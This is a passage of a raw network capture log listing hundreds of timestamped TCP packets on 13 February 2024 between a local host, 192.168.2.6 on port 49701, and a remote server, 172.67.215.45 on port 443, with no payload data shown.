                                                                  Feb 13, 2024 21:13:54.969022036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.969044924 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.969090939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.969090939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.969096899 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.969146967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.970252991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.970266104 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.970303059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.970316887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.970388889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.970721960 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.970735073 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.970784903 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.970784903 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.970792055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.970825911 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.971262932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.971276999 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.971309900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.971317053 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.971343994 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.971343994 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.971441984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.971455097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.971718073 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.971728086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.972511053 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.972752094 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.972764969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.972804070 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.972817898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.973870993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.973872900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.973881006 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.973903894 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.973937035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.973943949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.973958969 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.973979950 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.974647045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.974661112 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.974709988 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.974716902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.974740028 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.974750042 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.974760056 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.974767923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.974785089 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.975203991 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.975517035 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.975531101 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.975580931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.975580931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.975589037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.975687981 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.976382017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.976397038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.976480961 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.976489067 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.976625919 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.977513075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.977524996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.977585077 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.977591038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.977624893 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.977830887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.977845907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.977900028 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.977900028 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.977906942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.977967024 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.979079962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.979093075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.979149103 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.979149103 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.979159117 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.979192972 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.979372978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.979387045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.979422092 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.979428053 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.979443073 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.979541063 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.980334997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.980351925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.980401993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.980407953 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.980420113 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.980441093 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.981060028 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.981075048 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.981125116 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.981131077 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.981226921 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.981442928 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.981457949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.981518984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.981518984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.981528044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.981628895 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.984318972 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.984335899 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.984410048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.984416962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.984611034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.984739065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.984752893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.984797955 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.984812021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.984863997 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.985510111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.985524893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.985586882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.985593081 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.985630035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.985846043 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.985861063 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.985965014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.985971928 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.986073017 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.986618996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.986634970 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.986715078 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.986715078 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.986721992 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.986771107 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.987422943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.987437963 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.987505913 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.987509966 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.987584114 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.988311052 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.988326073 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.988401890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.988401890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.988409042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.988501072 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.988569975 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.988584042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.988647938 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.988647938 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.988653898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.988686085 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.989378929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.989393950 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.989444971 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.989456892 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.989592075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.990175009 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.990191936 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.990246058 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.990262032 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.990312099 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.990762949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.990778923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.990833044 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.990840912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.990885019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.991173983 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.991189003 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.991554022 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.991561890 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.991628885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.992027998 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.992043018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.992137909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.992144108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.992533922 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993228912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993246078 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993413925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993419886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993510008 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993513107 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993521929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993552923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993578911 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993585110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993634939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993634939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993840933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993855953 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.993906975 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.993915081 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.994029999 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.994467974 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.994483948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.994538069 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.994544029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.994554996 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.994580030 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.995109081 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.995125055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.995153904 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.995167971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.995203018 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.995203018 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.995417118 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.995431900 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.995465040 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.995471001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.995510101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.995549917 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.996226072 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.996241093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.996279955 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.996287107 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.996337891 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.996504068 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.996519089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.996553898 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.996567965 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.996599913 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.996599913 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.997279882 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.997296095 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.997328043 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.997342110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.997375965 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.997375965 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998086929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998104095 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998131990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998147964 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998178959 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998178959 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998646021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998660088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998716116 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998716116 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998723030 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998733997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998771906 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998773098 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998797894 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.998810053 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998845100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.998845100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.999602079 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.999615908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.999660015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.999666929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.999701023 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.999701023 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.000448942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.000463009 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.000531912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.000576973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.000576973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.000577927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.000600100 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.000639915 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.001370907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.001385927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.001425028 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.001434088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002125025 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002144098 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002186060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.002194881 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002239943 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.002592087 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002604961 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002645016 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.002665997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002773046 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002790928 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002835035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.002841949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.002888918 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.003685951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.003699064 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.003768921 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.003768921 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.003777027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.003909111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.003926039 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.003973007 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.003979921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.003990889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.004616022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.004630089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.004688025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.004688025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.004694939 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.005610943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.005630016 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.005659103 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.005672932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.005695105 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.005709887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.005722046 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.005763054 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.005763054 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.005768061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.006462097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.006479979 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.006517887 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.006525040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.006570101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.006953955 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.006968021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007010937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.007028103 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007069111 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.007744074 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007762909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007812977 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.007818937 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007831097 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.007920980 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007935047 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.007992029 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.007992029 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.007998943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.008661985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.008680105 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.008708000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.008721113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.008754969 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.008955002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.008968115 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.009008884 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.009023905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.009279966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.009387970 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.009671926 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.009685040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.009730101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.009736061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.010437965 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.010454893 CET44349701172.67.215.45192.168.2.6
